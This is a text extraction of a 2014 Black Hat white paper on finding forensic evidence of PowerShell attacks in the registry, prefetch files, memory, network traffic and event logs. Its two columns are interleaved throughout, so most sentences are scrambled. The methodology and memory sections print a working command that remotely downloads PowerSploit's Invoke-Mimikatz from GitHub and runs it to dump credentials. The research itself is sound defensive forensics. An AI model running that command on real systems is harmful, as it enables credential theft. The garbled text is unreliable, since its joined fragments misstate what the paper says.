Report CopyRight/DMCA Form For : Investigating Powershell Attacks Fireeye
the most popular penetration testing tools including TrustedSec Social Engineering Toolkit12 and Rapid7 Metasploit13 now include PowerShell payloads During the course of their incident response work at Mandiant the authors also have observed adversaries increasingly use PowerShell during targeted intrusions Many attackers just
Investigating PowerShell Attacks Black Hat USA 2014. Introduction and Prior Research 3,Assumptions 4,Testing Methodology 5. Findings and Sources of Evidence 5,Registry 5,Prefetch 6. Network Traffic 7,Event Logs 12,Persistent PowerShell 19. Acknowledgements 24,Appendix PowerShell Version Table 25. 2 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. Introduction And Prior Research injection utility and precursor to the rewritten. Microsoft Windows PowerShell has finally hit the PowerSploit Framework5 first released in May. mainstream for system administrators 2012 Throughout 2013 Joseph Bialek began. defenders and attackers Though nearly ten publishing a variety of in memory attacks. years old as of 2014 PowerShell has only leveraging reflective DLL loading through. recently become ubiquitous across both user PowerShell6 including the ability to remotely. endpoints and servers in most enterprise execute the Mimikatz7 credential harvesting tool. environments Microsoft Windows 7 SP1 and without ever writing malicious binaries to disk At. Windows Server 2008 R2 were the first versions ShmooCon 2013 Chris Campbell presented and. of the operating system to include PowerShell released code for a PowerShell botnet8 with. version 2 0 installed by default Since then complete command and control capabilities his. updated versions of PowerShell have been blog9 is frequently updated with additional. included in every subsequent release of PowerShell attack techniques. Windows through PowerShell 4 0 on Windows, Server 2012 R2 and on Windows 8 11 Throughout 2013 and 2014 Graeber Bialek. Campbell and other contributors developed, As is often the case the increased availability of PowerSploit10 from proof of concept code to a. PowerShell has paralleled the development of robust framework of scripts for the post. research on ways attackers can take advantage of exploitation phase of an attack facilitating code. it David Kennedy and Josh Kelley were among execution persistence reconnaissance. the first to present on this topic at Black Hat anti virus bypass and more Other PowerShell. 20102 demonstrating code execution password attack toolkits such as Nihkil Mittal s Nishang 11. dumping and creation of reverse shells via also emerged during this period Finally some of. PowerShell Chris Gates and Rob Fuller cited the most popular penetration testing tools. WinRM as a means of remote command including TrustedSec Social Engineering. execution during penetration tests at DerbyCon Toolkit12 and Rapid7 Metasploit13 now include. 20123 and in subsequent blog posts this PowerShell payloads. technique quickly gained traction among other, offensive security practitioners During the course of their incident response. work at Mandiant the authors also have, Beginning in late 2011 researchers began to observed adversaries increasingly use PowerShell. craft even more sophisticated PowerShell attack during targeted intrusions Many attackers just. methodologies and toolkits In November 2011 like system administrators and security. Matt Graeber released PowerSyringe4 a code professionals are only beginning to learn how to. A PowerShell version table is provided in the Appendix to this white paper. Kennedy David and Josh Kelley PowerShell It s Time To Own Black Hat Black Hat Jul 2010 29 Jun 2014. Gates Chris and Rob Fuller Dirty Little Secrets They Didn t Teach You In Pentest Class v2 SlideShare n p 10 Oct 2012 29 Jun 2014. Graeber Matthew PowerShell based Code Dll Injection Utility Exploit Monday n p 21 Nov 2011 29 Jun 2014. Graeber Matthew PowerSploit A PowerShell Post Exploitation Framework Exploit Monday n p 26 May 2012 29 Jun 2014. Bialek Joseph Reflective DLL Injection with PowerShell clymb3r n p 6 Apr 2013 29 Jun 2014. Bialek Joseph Modifying Mimikatz to be Loaded Using Invoke ReflectiveDLLInjection ps1 clymb3r n p 9 Apr 2013 29 Jun 2014. Campbell Chris No Tools No Problem Building a PowerShell Bot YouTube n p 16 Feb 2013 29 Jun 2014. http obscuresecurity blogspot com,https github com mattifestation PowerSploit. https github com samratashok nishang, http tipstrickshack blogspot com 2014 01 deliver powershell payload using macro html. http www metasploit com,3 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. most effectively leverage PowerShell during the This research began with the premise that an. post compromise phase of an incident As a attacker would rely upon PowerShell during the. result the authors often witness extremely basic post compromise phase of an incident In the. usage of PowerShell such as simply replacing the authors experience intruders typically gain local. use of remote command execution tools such as administrator privileges on one or several Windows. PsExec with PowerShell s Invoke Command or systems immediately or shortly after their initial. Enter PSSession to achieve their objectives entry vector into an environment Due to poorly. and evade detection However even these secured Active Directory environments and the. simplistic techniques introduce another means by widespread know how on how to move laterally. which attackers can leverage built in components and escalate privileges these first footholds. of the operating system instead of external tools frequently lead to compromise of elevated. or malware and thereby evade detection domain account privileges or Domain. Administrator altogether,The widespread availability of PowerShell in an. average corporate Windows environment the The authors therefore based their research on the. maturation of PowerShell attack toolkits and the following assumptions. steady increase in PowerShell know how among, intruders has created a perfect storm for those The attacker can obtain administrator equiv. seeking to protect a network or investigate a alent rights on the target system most. compromise This motivated the authors to focus typically the credentials for a privileged. their efforts on the forensic footprints left behind domain account. by the various ways that an attacker might use, PowerShell a topic for which publicized research The attacker can laterally access the target. is scarce as of this writing system over common Windows ports and. protocols e g SMB NetBIOS and or WinRM,The goals of this research were to identify the. sources of evidence on disk in logs and in memory The attacker can remotely enable PowerShell. resulting from malicious usage of PowerShell remoting and the WinRM service on a remote. particularly when used to target a remote host host by means of other native Windows. Understanding these artifacts can help reconstruct commands such as through a scheduled task. an attacker s activity during forensic analysis of a at command the service control manager. compromised system In addition they can help sc command or Windows Management. analysts recognize the sources of evidence that are Instrumentation WMI. suitable for proactive monitoring both on a single. system and at scale to detect PowerShell attacks The attacker can bypass the default Restrict. ed policy under which PowerShell will,Assumptions execute scripts 14. Although this white paper focuses on forensic, analysis it is worthwhile to briefly discuss the The attacker given administrator privileges. Windows security controls intended to limit could bypass or disable a constrained. malicious usage of PowerShell and the authors remoting endpoint configured to limit the. assumptions regarding an attacker s level of access scope of PowerShell commands available to a. http technet microsoft com en us library hh849812 aspx. 4 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. user A lower privileged attacker might also malware exe. bypass such controls Joseph Bialek and Lee, Holmes have also recently blogged on Remote in memory download and execution. techniques to break out of constrained of PowerSploit framework script In. runspace if implemented with vulnerable voke Mimikatz ps1 such as. code and run unauthorized commands 15 Invoke Command 192 168 17 150. iex New Object Net WebClient, Finally the authors chose to focus their research on DownloadString https raw. sources of evidence that were specific to usage of githubusercontent com mattifes. PowerShell Analysis of the forensic artifacts tation PowerSploit master Exfil. common to any user interaction with a Windows tration Invoke Mimikatz ps1. system such as logon events generated during Invoke Mimikatz DumpCreds. authentication artifacts of interactive usage of, Explorer etc are well covered by prior research Remote interactive PowerShell command. and beyond the scope of this study session initiated with the syntax En. ter PSSession 192 168 17 150,Testing Methodology, The authors conducted the majority of testing The authors also utilized evidence gathered. using a client e g attacker and remote e g victim during their work conducting incident response. system running Windows 7 SP1 All test sequences and forensic analysis for Mandiant Wherever. were performed using PowerShell 2 0 the most possible test scenarios were constructed to. common pre installed version in the wild The replicate these findings in a controlled. authors performed additional testing with environment to ensure their accuracy. PowerShell 3 0 on both the client and server This, white paper denotes any instances where available Findings and Sources of Evidence. evidence may differ between versions of PowerShell The following sections summarize each of the. sources of evidence that may provide evidence of, The authors executed the following sequence of malicious PowerShell usage on a compromised. commands during testing These commands were system These sources include the registry. chosen as representative examples of how an prefetch files memory event logs and network. attacker might interact with a targeted system traffic In addition the authors provide an analysis. through PowerShell They also make use of basic of forensic artifacts that may result when an. cmdlets that are likely to be used even in more attacker configures a PowerShell script to persist. complex attacks on a system,Single remote cmdlet execution through Registry. Invoke Command such as In The authors did not identify any registry keys or. voke Command 192 168 17 150 values that recorded the execution of PowerShell. Get ChildItem c scripts commands or remoting activity However an. attacker may tamper with PowerShell configuration, Single remote binary execution through settings that are resident in the registry to facilitate. Invoke Command such as In their activity,voke Command 192 168 17 150 c. Bialek Joseph Cracking Open PowerShell s Constrained Runspacer Clymb3r n p 25 Jun 2014 29 Jun 2014. 5 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. One such example is the PowerShell execution policy denoted with extension PF in the directory. which controls the profiles and scripts that a user is systemroot prefetch Forensic investigators. permitted to load and execute on a system The often use the prefetch as a source of evidence of. registry stores this setting in the value executable files that previously ran on a system. ExecutionPolicy within key HKEY LOCAL Parsing the contents of these files17 can yield. MACHINE SOFTWARE Microsoft, PowerShell 1 ShellIds Microsoft Date and time of first execution corresponding. PowerShell By default the policy is set to to the prefetch file creation date. Restricted on all versions of Windows except, Windows Server 2012 R2on which it is set to Last run time stored within the prefetch file. RemoteSigned16 The execution policy can be, configured through Group Policy as a result this of times executed stored within the prefetch file. setting should be consistent across most or all, systems in a typical Active Directory environment List of files accessed during the first ten. seconds of execution stored within the, An attacker may change the setting to Bypass prefetch file. before attempting to execute malicious PowerShell, script This would result in an update to the Last Full path to executable file derived from. Modified timestamp of the registry key Based on accessed file list. the authors observations this key does not, frequently change during normal system During testing and in real world incident. operations Of course an attacker could avoid investigations the authors observed that the. modifying this setting and simply include the prefetch file for powershell exe can contain. command line option ExecutionPolicy references to recently executed PowerShell. Bypass each time they invoked PowerShell scripts In order to be present within the prefetch. However the authors have investigated at least file s accessed file list a given script must be. one case where the attacker consistently modified loaded within the first ten seconds of. the execution policy when interacting with powershell exe execution This reliably occurs. targeted systems during lateral movement when running powershell exe at a command. line with a script argument but not when using an,interactive PowerShell session. Windows Prefetch is a performance enhancement As an example the authors executed a test script. feature first introduced in Windows XP designed to from the command shell using the syntax. shorten load times during boot and application powershell exe File C temp. startup The operating system stores prefetch files persistence ps1. about Execution Policies Microsoft TechNet n p 8 May 2014 30 Jun 2014. Numerous free tools and scripts can parse prefetch files Several used by the authors include NirSoft WinPrefetch View http www nirsoft net utils. win prefetch view html TZWorks Prefetch Parser https tzworks net prototype page php proto id 1 and Mandiant Redline https www mandiant. com resources download redline The Accessed File list is also plainly visible in Unicode strings within a prefetch file. 6 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. This resulted in an update to the Last Run time and systems each file is only several hundred kilobytes. an increment to the run count stored within the If an analyst has already identified attacker staging. corresponding prefetch file POWERSHELL directories or file naming conventions from previous. EXE 59FC8F3D pf The accessed file list investigative findings this information could be used. contained a reference to the script as shown below for initial searches against the accessed file lists It. Figure 1 Portion,of accessed file list,within prefetch file. for PowerShell exe, The accessed file list does retain entries from also may be possible to conduct frequency analysis. previous instances of a given program executing of script names and paths referenced across all of. so even if powershell exe runs again the gathered prefetch files in order to identify. subsequent to attacker activity its prefetch file uncommon or suspicious entries. may still retain the accessed file information for a. previously loaded script Network Traffic,The authors did not extensively analyze network. As part of an investigative process the authors based evidence resulting from PowerShell remoting. recommend the following basic steps activity As of PowerShell version 2 0 all remoting. traffic occurs over ports 5985 HTTP and 5986, Examine the PowerShell prefetch file creation HTTPS by default In both cases the request. timestamp and last run timestamp to determine payloads are encrypted use of HTTPS only adds. if they correlate with other periods of suspect header encryption since all content is sent over SSL. ed attacker activity Clear text HTTP headers may only provide the. username conducting the remoting in the case of, Parse or string search the accessed file list and NTLMSSP authentication present in the. examine the names and paths of any referenced Authorization header and the version of the. PS1 files PowerShell client in use, The authors have also conducted this analysis Investigators may have more success conducting. at scale across large Windows environments Given network flow analysis to identify anomalous usage of. the forensic tools to do so one could collect and PowerShell remoting If remoting is legitimately used. search all PowerShell prefetch files across all for system administration activities in an. 7 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. environment it should originate from a predictable The first step of analysis was to identify the. set of source systems Organizations with the processes on a targeted system whose memory. capability to monitor flows across internal to space might contain remnants of PowerShell. internal DMZ to internal or VPN to internal remoting activity Upon receiving a remote. network segments should attempt to baseline traffic command the instance of the service host process. over ports 5985 and 5986 This may help identify svchost exe running the DCOM Server Process. unauthorized usage of remoting by an attacker Launcher service short name DCOMLaunch. spawns an instance of c windows system32,Memory wsmprovhost exe This binary is the host. The authors focused their memory analysis process for WinRM plugins What occurs next. research on the forensic impact of PowerShell depends on the type of PowerShell command. remote code execution through the WinRM executed through remoting. service Although local execution of PowerShell, scripts and code certainly yields its own set of If the command invokes a native cmdlet it. memory resident artifacts other sources of executes directly within the context of. evidence documented in this white paper can wsmprovhost exe it does not spawn a. provide better coverage of these scenarios The separate child instance of powershell exe. authors were most interested in determining how Once the cmdlet completes. memory analysis could address the worst case wsmprovhost exe terminates. scenario of an attacker using PowerShell remoting, in combination with in memory attacks like If the command executes a separate binary. reflective DLL injection to compromise a remote such as an executable file already on the. system without ever touching its disk victim s disk the binary is loaded as a child. process of wsmprovhost exe Once the, To conduct this research the authors took binary exits wsmprovhost exe terminates. memory snapshots of a victim system before, during and after the execution of the commands If the command initiates an interactive. listed in the methodology section of this white PowerShell session e g through En. paper Analysis of the memory images was ter PSSession it runs directly within the. conducted using Volatility Framework and context of wsmprovhost exe This. Mandiant Redline process continues to execute until the. PSSession terminates,8 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. In all three cases the authors observed that However in practice wsmprovhost exe is not a. PowerShell objects and Remoting Protocol XML useful source of evidence because it terminates. remained readily visible in the process memory immediately upon the conclusion of a remoting. space of wsmprovhost exe 18 session In most investigative scenarios an analyst. would not be able to identify a potentially, In the example depicted below the authors compromised system and capture memory from. executed the command echo helloworld this process before it had exited. c test txt during an interactive remote, PSSession executed the dir command to confirm Another instance of svchost exe that which. the presence of the output file then captured loads the WinRM service is a more promising. memory from the target system before ending the target for post compromise analysis Depending on. session Note that the objects visible in process the host configuration Windows may automatically. memory contained both the submitted commands start the WinRM service upon boot or an attacker. as well as the output may remotely start it when enabling remoting The. Figure 2 Remnants,of echo command,during PSSession. retained in,wsmprovhost exe,Figure 3 Remnants,of dir output in. wsmprovhost exe, Microsoft documents the PowerShell Remoting Protocol at http msdn microsoft com en us library dd357801 aspx. 9 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. memory space of the WinRM service can contain Invoke Command Computername. portions of Web Services Management WSMAN 192 168 114 133 iex New Object. SOAP messages exchanged during remoting A Net WebClient. subset of these messages may include clear text DownloadString https raw. commands and cmdlets executed one at a time or githubusercontent com. during interactive sessions Most importantly and mattifestation PowerSploit master. in contrast to wsmprovhost exe the service Exfiltration Invoke Mimikatz. continues to run after the completion of a ps1 Invoke Mimikatz DumpCreds. PowerShell session,This command downloads Invoke, The figure below provides a fragment of SOAP Mimikatz ps1 stores it in memory and. containing the command echo teststring executes it with the option DumpCreds In. pssession c testoutput pssession txt turn Invoke Mimikatz ps1 uses reflective. DLL injection to load Mimikatz in memory and, The evidence was recovered from WinRM harvest credentials The result is remote. svchost exe memory on an accessed system execution of Mimikatz without ever touching. after a remote interactive PSSession had completed disk an ideal challenge for memory forensics. and wsmprovhost exe had terminated,The authors acquired memory from the victim. In another test scenario the authors used a system twice once immediately following the. variation of a technique19 that downloads and completion of the remote Invoke Mimikatz. executes the Invoke Mimikatz PowerSploit PowerShell and once after five hours had. script on a remote host The PowerShell transpired In both cases the WinRM svchost. command executed on the client attack system exe contained a nearly complete copy of the. was as follows attack system s command line Figure 5 depicts a. memory dump at the offset where this string was,located as produced by Volatility. Figure 4 Remnants,of PowerShell,remoting commands,in WinRM svchost exe. Gates Chris Dumping a domain s worth of passwords with mimikatz Carnal0wnage Blog n p 4 Oct 2013 30 Jun 2014. 10 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. Figure 5 Remnants,of remote Invoke,Mimikatz attack in. WinRM svchost exe, There are several important caveats to this approach Analysts should review the contents of memory. First analysts should expect to deal with a significant offsets adjacent to each search hit for additional. amount of noise and irrelevant data when searching context and remnants of command activity. memory for remnants of command PowerShell, objects and SOAP carry enormous overhead a single How long is such evidence retained in WinRM. cmdlet and response may result in dozens of service memory Test results suggested that the. messages The authors encountered the same most significant variable was the volume of. challenges when examining PowerShell analytic logs WinRM activity that occurs following the. as noted in the Event Logs portion of this white paper commands of interest Virtual machines. A manual review process without knowing exactly configured with only 512MB of RAM fully. what to search for may be tedious utilized still contained recoverable remnants of. commands within the WinRM svchost exe, Testing identified several strings present within the process memory space after one week had. PowerShell Remoting Protocol or the WSMan elapsed However the authors also found that the. protocol used in WinRM that are effective starting number of recoverable commands was difficult to. points for searches predict and any subsequent WinRM activity. quickly eradicated remnants of older sessions,Memory and disk snapshots acquired during. wsman xsd testing also contained remnants of PowerShell. remoting commands in kernel pool and in the, rsp Command pagefile The authors found that the presence of. this evidence was largely the result of paging, rsp CommandLine activity that can be difficult to predict or control. Kernel memory and the pagefile should be, rsp Arguments included in the scope of string searches for. PowerShell command artifacts but may yield a,low rate of returns. 11 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. As is always the case with memory forensics activity At enterprise scale these events may. time is of the essence The authors research be used to establish a baseline of normal. concluded that it is possible to reconstruct at PowerShell usage and thereby identify anomalies. least fragments of PowerShell remoting activity, in memory even at the completion of a session Upon executing any PowerShell command or. These techniques may be practical when script regardless if locally or through remoting. conducting analysis of a single system of interest Windows may write events to the following. however they do not readily lend themselves to three logs. at scale proactive monitoring of systems in an,enterprise environment Windows PowerShell evtx. Event Logs Microsoft Windows Power, Windows event logs are instrumental when Shell 4Operational evtx20. examining a potentially compromised system for, evidence of attacker activity Earlier versions of Microsoft Windows Power. Windows PowerShell version 2 0 and prior Shell 4Analytic etl. provide few useful audit settings thereby limiting. the availability of evidence such as a command Since PowerShell implements its remoting. history useful for forensic analysts PowerShell functionality through the Windows Remote. 3 0 and later has largely addressed this Management WinRM service the following. shortcoming with the introduction of a more two event logs also capture remote. robust module logging feature However in the PowerShell activity. authors experience Windows 7 and Server 2008, remain the most prevalent operating systems in Microsoft Windows WinRM 4Opera. most corporate environments Without being tional evtx. explicitly upgraded to PowerShell 3 0 these, systems will unfortunately not have access to its Microsoft Windows WinRM 4Analyt. enhanced auditing capabilities ic etl, Nevertheless even the default level of logging Logging in PowerShell 2 0. in older versions can provide sufficient evidence In general PowerShell 2 0 event logs can provide. to identify signs of PowerShell usage the start stop times of command activity or. distinguish remoting from local activity and script execution the loaded providers indicative. provide context such as the duration of sessions of the types of functionality in use and the user. and associated user account This may help an account under which the activity occurred They. analyst correlate other forensic evidence on a do not provide a detailed history of all executed. single system of interest with PowerShell commands or their output. The Operational and Analytic logs actually contain a forward slash in their name e g Microsoft Windows PowerShell Operational evtx The corresponding. log filenames on disk use the encoded character 4 in place of the slash. 12 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. The analytic logs disabled by default pose the Microsoft Windows WinRM 4Operational evtx. opposite problem If enabled they capture an The WinRM Operational log records all use. enormous volume of data essentially every of the Windows Remote Management. PowerShell operation or SOAP remoting service including that which is conducted. message exchanged during activity However through PowerShell remoting The authors. the quantity of these events and the need to found the following event IDs provide. assemble and decode log messages can hinder useful forensic evidence. practical analysis,EID 6 Recorded at the onset of remoting. The following sections summarize the important activity on the client system Includes the. evidence captured by each event log pertaining to destination address to which the system. PowerShell 2 0 activity connected Example, Windows PowerShell evtx Creating WSMan Session The con. Each time that PowerShell executes either upon nection string is. the execution of a single command the start of a 192 168 114 140 wsman PSVer. local session or the start of a remoting session sion 2 0. this log records an Event ID EID 400 message, Engine state is changed from None EID 169 Recorded at the onset of remoting. to Available At the completion of the activity on an accessed system Includes the. session the log records an EID 403 event username and authentication mechanism. Engine state is changed from used to access WinRM Example. Available to Stopped,User win alicePC alice authenti. The message details for both EID 400 and EID cated successfully using NTLM. 403 events include a HostName field If executed authentication. locally this field will be logged as, HostName ConsoleHost If PowerShell ID 81 82 134 Generated by the under the. remoting is in use the accessed system hood operations that occur during Power. will record these events with Shell remoting on an accessed system. HostName ServerRemoteHost Rather than recording the specific commands. submitted at the command line these entries, Neither message records the user account are rather vague and low level The User. associated with the PowerShell activity However name field in these messages does record. by using these events an analyst may determine the domain and username of the account. the duration of a PowerShell session and whether conducting the remoting activity Aside from. it ran locally or through remoting that these events are mainly useful for. defining the timeframe during which, Microsoft Windows PowerShell 4Operational evtx remoting occurred. The authors did not identify any forensically,significant events written to the PowerShell. Operational event log when using PowerShell 2 0,13 www fireeye com. Investigating PowerShell Attacks Black Hat USA 2014. The following examples illustrate the types of Microsoft Windows PowerShell 4Analytic etl. event messages captured in the WinRM PowerShell analytic logging must be. Operational event log during the execution of explicitly enabled to capture events and is. a PowerShell remoting command intended for troubleshooting rather than a. long term auditing solution When active, EID 82 Entering the plugin for the log records all remotely executed. operation CreateShell with a Re PowerShell commands and the. sourceURI of http schemas corresponding responses under the. microsoft com powershell Micro following event IDs. soft PowerShell,EID 32850 Records the user account that. EID 81 Processing client request authenticated for remoting Example. for operation CreateShell Request 7873936 Creating a. server remote session UserName,EID 134 Sending response for CORPDOMAIN JohnD. operation CreateShell,EID 32867 32868 Records each PowerShell. EID 81 Processing client request input and output object that is exchanged. for operation DeleteShell during PowerShell remoting including protocol. and version negotiation as well as command I O, Microsoft also provides the ability to disable The objects are stored as XML encoded. Windows Remote Shell the component of hexadecimal strings in a field denoted Payload. WinRM that supports the PowerShell cmdlets data and due to length are often fragmented. Invoke Command and Enter PsSession across multiple log messages. This setting can be enabled through Group Policy, under Computer Configuration Administrative While this log can contain forensically significant. Templates Windows Components Windows evidence of PowerShell remoting activity the volume. Remote Shell Allow Remote Shell Access If set of events and level of effort required to decode them. to Disabled on the remote system the source limits their practical use during investigations. system attempting to initiate a Remote Shell,connection will record the following EID 142. event in the WinRM Operational log,WSMan operation CreateShell failed. error code 2150859180,14 www fireeye com, Investigating PowerShell Attacks Black Hat USA 2014. The figure below displays an example of an EID iDecoding this message results in the XML. 32867 event generated on a remotely accessed depicted below Note that the command Get. system upon the execution of a simple PowerShell ChildItem and argument C are visible in. command Invoke Command Get plain text,ChildItem C,Figure 6 Encoded. PowerShell remoting,command in,PowerShell analytic. Figure 7 Excerpt,of decoded,XML containing,PowerShell command. and argument, The subsequent EID 32868 events containing the command output once decoded appears as follows.